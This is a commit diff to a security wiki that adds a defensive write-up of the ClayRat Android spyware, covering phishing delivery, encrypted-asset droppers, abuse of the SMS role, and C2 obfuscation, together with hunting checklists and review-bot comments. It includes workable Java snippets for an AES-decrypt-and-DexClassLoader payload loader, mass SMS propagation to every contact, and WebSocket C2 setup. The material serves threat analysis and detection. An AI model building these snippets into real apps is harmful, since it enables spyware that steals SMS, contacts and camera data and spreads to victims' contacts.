mirror of https://github.com/HackTricks-wiki/hacktricks.git, synced 2025-10-10 18:36:50 +00:00
	Add content from: ClayRat: A New Android Spyware Targeting Russia
This commit is contained in: parent 96defaa9b3, commit e31c5d1278
				| @ -429,6 +429,124 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new | ||||
| - Detect installation/launch of an external NFC-relay app triggered by another app. | ||||
| - For banking: enforce out-of-band confirmations, biometrics-binding, and transaction-limits resistant to on-device automation. | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Android SMS role abuse, session-based droppers with encrypted assets, and C2 obfuscation – ClayRat tradecraft | ||||
| 
 | ||||
| ClayRat is a fast-evolving Android spyware family distributed via look‑alike sites and Telegram channels. Below are reusable techniques observed in the campaign that defenders and red-teamers should model and hunt for. | ||||
| 
 | ||||
| ### Delivery funnel: lookalike site → Telegram → APK | ||||
| - Phishing pages impersonate popular apps/services and include step-by-step instructions to enable Unknown Sources on Android. | ||||
| - Users are redirected to Telegram channels seeded with testimonials/metrics before receiving the APK link. This social proof reduces suspicion. | ||||
| 
 | ||||
| ### Session-based installer: encrypted payload in assets + fake Play update UI | ||||
| - The first-stage app presents a fake “Google Play update/verification” screen. | ||||
| - The functional spyware is stored as an encrypted blob under `/assets/` and decrypted only at runtime, then dynamically loaded. | ||||
| - Packed variants hide most logic until decryption, hampering static analysis. | ||||
| 
 | ||||
| Static triage ideas | ||||
| - Unzip and look for large opaque blobs under `assets/` whose entropy is high. | ||||
| - Instrument filesystem to catch a DEX/ZIP written to app-internal storage just before `DexClassLoader`/`PathClassLoader` usage. | ||||
| - APKiD often shows “packer/loader” hints; network traffic may be minimal until decryption completes. | ||||
| 
 | ||||
| <details> | ||||
| <summary>Example: AES‑GCM decrypt from assets and load with DexClassLoader</summary> | ||||
| 
 | ||||
| ```java | ||||
| // 1) Read encrypted payload from assets | ||||
| byte[] enc = readAll(getAssets().open("payload.enc")); | ||||
| byte[] iv  = Arrays.copyOfRange(enc, 0, 12); | ||||
| byte[] ct  = Arrays.copyOfRange(enc, 12, enc.length); | ||||
| 
 | ||||
| // 2) Decrypt (key could be hardcoded/derived from device info) | ||||
| SecretKey key = new SecretKeySpec(deriveKey(), "AES"); | ||||
| Cipher c = Cipher.getInstance("AES/GCM/NoPadding"); | ||||
| c.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(128, iv)); | ||||
| byte[] dexBytes = c.doFinal(ct); | ||||
| 
 | ||||
| // 3) Persist DEX and dynamically load | ||||
| File outDex = new File(getCodeCacheDir(), "p.dex"); | ||||
| Files.write(outDex.toPath(), dexBytes); | ||||
| DexClassLoader cl = new DexClassLoader(outDex.getPath(), getCodeCacheDir().getPath(), null, getClassLoader()); | ||||
| Class<?> core = cl.loadClass("com.spy.core.Main"); | ||||
| core.getMethod("start", Context.class).invoke(core.getConstructor().newInstance(), this); | ||||
| ``` | ||||
| </details> | ||||
| 
 | ||||
| ### Privilege consolidation via the default SMS handler role | ||||
| Requesting the device’s default SMS app role consolidates powerful capabilities behind a single consent dialog on modern Android (instead of individual runtime prompts): read/send/intercept SMS, and direct DB access. Malware leverages this to silently mass-message, steal OTPs, and exfiltrate SMS at scale. | ||||
| 
 | ||||
| Minimal request flow (Android 10+): | ||||
| 
 | ||||
| ```java | ||||
| RoleManager rm = (RoleManager) getSystemService(Context.ROLE_SERVICE); | ||||
| if (rm.isRoleAvailable(RoleManager.ROLE_SMS) && !rm.isRoleHeld(RoleManager.ROLE_SMS)) { | ||||
|     Intent i = rm.createRequestRoleIntent(RoleManager.ROLE_SMS); | ||||
|     startActivityForResult(i, 1001); | ||||
| } | ||||
| ``` | ||||
| 
 | ||||
| Hunting/detection | ||||
| - Alert when the default SMS handler changes to an untrusted package. | ||||
| - Monitor immediate spikes in `SEND_SMS` usage and access to `content://sms` following role grant. | ||||
| 
 | ||||
| ### Worm-like propagation via contact list | ||||
| Once SMS and contacts are accessible, the implant mass-sends lures to every contact from the victim’s number. | ||||
| 
 | ||||
| ```java | ||||
| Cursor c = getContentResolver().query( | ||||
|     ContactsContract.CommonDataKinds.Phone.CONTENT_URI, | ||||
|     new String[]{ContactsContract.CommonDataKinds.Phone.NUMBER}, null, null, null); | ||||
| SmsManager sms = SmsManager.getDefault(); | ||||
| while (c.moveToNext()) { | ||||
|   String num = c.getString(0); | ||||
|   sms.sendTextMessage(num, null, "Узнай первым! <link>", null, null); | ||||
| } | ||||
| ``` | ||||
| 
 | ||||
| ### Event‑driven control: BroadcastReceivers for SMS and calls | ||||
| Receivers enable reactive execution without a foreground service. | ||||
| 
 | ||||
| Manifest sketch: | ||||
| 
 | ||||
| ```xml | ||||
| <receiver android:name=".SmsRx" android:exported="true"> | ||||
|   <intent-filter> | ||||
|     <action android:name="android.provider.Telephony.SMS_RECEIVED"/> | ||||
|   </intent-filter> | ||||
| </receiver> | ||||
| <receiver android:name=".OutCall" android:exported="true"> | ||||
|   <intent-filter> | ||||
|     <action android:name="android.intent.action.NEW_OUTGOING_CALL"/> | ||||
|   </intent-filter> | ||||
| </receiver> | ||||
| ``` | ||||
| 
 | ||||
| Observed actions include immediate front‑camera capture and upload on first run, full SMS dump, call log exfiltration, and commandable call placement. | ||||
| 
 | ||||
| ### C2 traffic protection, markers, and proxy/WebSocket pivot | ||||
| - Early variants obfuscate with Base64 and inject the marker string `apezdolskynet` in payloads (plaintext visible after decode). Hunt for this artifact in HTTP bodies. | ||||
| - Later builds encrypt telemetry and tasking with **AES‑GCM** and keep logic packed until runtime. | ||||
| - Resilient comms: a command like `get_proxy_data` returns an HTTP/HTTPS endpoint which is converted to a (secure) WebSocket and augmented with a device ID; tasks are scheduled periodically/delayed to keep the channel alive. | ||||
| 
 | ||||
| ```java | ||||
| String cfg = httpGet(c2+"/get_proxy_data"); // returns e.g., https://c2.tld/path | ||||
| Uri u = Uri.parse(cfg); | ||||
| String ws = ("https".equals(u.getScheme()) ? "wss" : "ws") + "://" + u.getHost() + | ||||
|             (u.getPort()!=-1?":"+u.getPort():"") + u.getPath() + "?id=" + deviceId; | ||||
| // connect(ws); schedule heartbeat/retry tasks | ||||
| ``` | ||||
| 
 | ||||
| ### DFIR/Hunting checklist (ClayRat-style) | ||||
| - Network: flag HTTP POST bodies that Base64‑decode to include `apezdolskynet`. | ||||
| - Role events: monitor/alert on default SMS handler changes; look for mass‑SMS bursts. | ||||
| - APK triage: encrypted blobs in `/assets/` with runtime `DexClassLoader` usage; fake Play update UI. | ||||
| - Components: receivers for `SMS_RECEIVED` and `NEW_OUTGOING_CALL` in untrusted apps. | ||||
| - Behaviour: front camera used immediately after first grant; exfil of SMS, call logs, notifications. | ||||
| - Hygiene: ensure Play Protect is enabled; deploy mobile EDR/MTD and block sideloading where possible. | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign) | ||||
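Review bot: The manifest sketch under "Event-driven control: BroadcastReceivers for SMS and calls" leaves out the prerequisites that decide whether these receivers fire at all: `android.provider.Telephony.SMS_RECEIVED` is only delivered to an app that declares `RECEIVE_SMS`, and `android.intent.action.NEW_OUTGOING_CALL` needs `PROCESS_OUTGOING_CALLS` and has been deprecated since API 29, so a hunter triaging an Android 10+ sample should not treat the outgoing-call receiver alone as proof of working call interception; a short line after the manifest stating the required permissions and the deprecation would make the section accurate. In the `<details>` example, `readAll()` and `deriveKey()` are undefined, the snippet assumes it runs inside an `Activity`/`Context` (`getAssets()`, `getCodeCacheDir()`, `this`), and the `DexClassLoader` optimizedDirectory argument is ignored from API 26 on; one comment saying the helpers are placeholders and naming the enclosing context would keep the sketch self-explanatory. The propagation snippet never closes its `Cursor`, and `SmsManager.getDefault()` is deprecated since API 31 in favour of `context.getSystemService(SmsManager.class)`.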
| @ -440,5 +558,10 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new | ||||
| - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) | ||||
| - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) | ||||
| - [Socket.IO](https://socket.io) | ||||
| - [ClayRat: A New Android Spyware Targeting Russia](https://zimperium.com/blog/clayrat-a-new-android-spyware-targeting-russia) | ||||
| - [ClayRat IOCs – Zimperium GitHub](https://github.com/Zimperium/IOC/tree/master/2025-10-ClayRat) | ||||
| - [Android dangerous permissions overview](https://developer.android.com/guide/topics/permissions/overview#dangerous_permissions) | ||||
| - [RoleManager (default SMS app role)](https://developer.android.com/reference/android/app/role/RoleManager) | ||||
| - [Google Play Protect overview](https://support.google.com/googleplay/answer/2812853?hl=en) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
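Review bot: The `{{#include ../../banners/hacktricks-training.md}}` line appears twice at the end of the file in this hunk; if one of the two copies is introduced by this commit, drop it so the banner renders once. The five new reference entries follow the existing `- [title](url)` style of the list, so no change is needed there.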